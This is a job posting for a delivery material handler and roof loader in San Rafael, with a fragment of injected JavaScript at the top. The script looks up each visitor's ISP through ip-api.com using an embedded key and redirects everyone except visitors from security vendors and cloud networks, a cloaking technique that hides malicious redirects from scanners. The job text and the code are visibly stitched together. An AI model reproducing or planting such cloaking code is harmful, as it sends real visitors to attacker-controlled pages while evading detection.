Delivery Material Handler / Roof Loader
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Delivery Material Handler / Roof Loader (165) to join our team in San Rafael, California.
Responsibilities:
- Load, unload, and organize roofing materials efficiently and safely.
- Assist with delivery of materials to job sites, ensuring timely and accurate deliveries.
- Inspect materials for damage or defects prior to loading.
- Operate basic equipment and tools required for material handling.
- Maintain a clean and organized work area to promote safety and efficiency.
- Follow safety protocols and proper lifting techniques at all times.
Skills Needed:
- Physical stamina and ability to lift heavy materials regularly.
- Good organizational skills and attention to detail.
- Ability to work effectively in a team environment.
- Strong communication skills and reliability.
- Knowledge of safety procedures related to roofing materials and loading.
Benefits:
- Competitive pay
- Health and dental insurance options
- Paid time off and holidays
- Opportunities for growth and advancement
- Consistent work schedule in a supportive team environment